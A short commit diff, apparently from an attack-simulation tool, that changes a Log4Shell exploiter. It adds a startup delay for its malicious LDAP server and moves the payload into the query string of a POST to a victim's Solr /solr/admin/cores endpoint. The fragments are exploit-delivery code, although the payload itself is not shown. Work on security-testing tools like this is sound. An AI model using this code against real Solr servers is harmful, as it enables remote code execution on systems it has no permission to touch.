Agent: fix race condition between ldap server and malicious requests
This commit is contained in:
parent
b94c8e54e2
commit
9f5034a8e5
|
@ -34,6 +34,7 @@ class Log4ShellExploiter(WebRCE):
|
|||
_EXPLOITED_SERVICE = "Log4j"
|
||||
DOWNLOAD_TIMEOUT = 15
|
||||
REQUEST_TO_VICTIM_TIME = 5 # How long the request from victim to monkey might take. In seconds
|
||||
LDAP_SERVER_INIT_DELAY = 5 # Time period that code halts waiting for ldap server to start
|
||||
|
||||
def __init__(self, host: VictimHost):
|
||||
super().__init__(host)
|
||||
|
@ -111,6 +112,8 @@ class Log4ShellExploiter(WebRCE):
|
|||
# constructor directly after merging to the agent-refactor branch.
|
||||
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
|
||||
self._ldap_server_thread.start()
|
||||
logger.debug(f"Sleeping {Log4ShellExploiter.LDAP_SERVER_INIT_DELAY} seconds for ldap process to start")
|
||||
sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)
|
||||
|
||||
def _stop_servers(self):
|
||||
logger.debug("Stopping all LDAP and HTTP Servers")
|
||||
|
|
|
@ -13,9 +13,10 @@ class SolrExploit(IServiceExploiter):
|
|||
|
||||
@staticmethod
|
||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores"
|
||||
payload = {"foo": payload}
|
||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||
try:
|
||||
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||
logger.debug("Sending malicious SOLR log4j request")
|
||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||
logger.debug("Request sent")
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
|
Loading…
Reference in New Issue